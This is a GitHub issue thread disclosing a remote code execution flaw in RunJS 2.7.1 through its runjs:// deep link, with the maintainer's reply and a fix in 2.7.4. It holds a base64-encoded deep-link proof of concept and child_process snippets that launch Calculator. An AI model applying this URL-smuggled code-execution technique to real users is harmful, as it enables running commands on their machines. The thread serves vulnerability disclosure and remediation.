### ISSUE TITLE
BUG: RunJS Remote Code Execution via DeepLink

### ISSUE THREAD

**Issue by aht7525** [lukehaas/RunJS#500]
```
Author: bob11.devranger@gmail.com
Data: 2022-11-08
OS: Windows, Linux, MacOS
RunJS Version : 2.7.1
```

### Summary

---

It has been possible to trigger remote code execution!

### Description

---

RunJS can run nodejs. 

But it can run vulnerable nodejs module. Like this:

[Windows]

```jsx
require('child_process').execSync('calc');
```

![runjs-rce-windows](https://user-images.githubusercontent.com/33015799/200526155-2d2f4a36-446f-4196-afed-e616105df548.png)

[MacOS]

```jsx
require('child_process').exec('open /System/Applications/Calculator.app')
```

![runjs-rce-macos](https://user-images.githubusercontent.com/33015799/200526226-2183da5a-016a-4c39-8d31-352a769de277.png)

And we knew that we could open the file through deeplink, so we took advantage of this and we were able to use it as follows.

[MacOS RCE deeplink]

```
runjs://asdf?script=cmVxdWlyZSgnY2hpbGRfcHJvY2VzcycpLmV4ZWMoJ29wZW4gLWEgL1N5c3RlbS9BcHBsaWNhdGlvbnMvQ2FsY3VsYXRvci5hcHAnKQ==
```

You can see this poc in this page.

https://drive.google.com/file/d/1jb_RBd6wPtWqmgqYY2U0wnn3Qg0ukREw/view?usp=sharing

### What’s More?

---

- if you have any problems, contact me via [aht5886@gmail.com] or [bob11.devranger@gmail.com]
- Thank You!

**Comment by lukehaas** [comment]
@aht7525 thanks for raising this.
User consent is required for deep links to open RunJS, which should make deep linking safe and no different to downloading a JS file and executing it.
However, to err on the side of caution, I will remove the deep linking functionality from the next version of RunJS.

**Comment by lukehaas** [comment]
This is now resolved in version 2.7.4
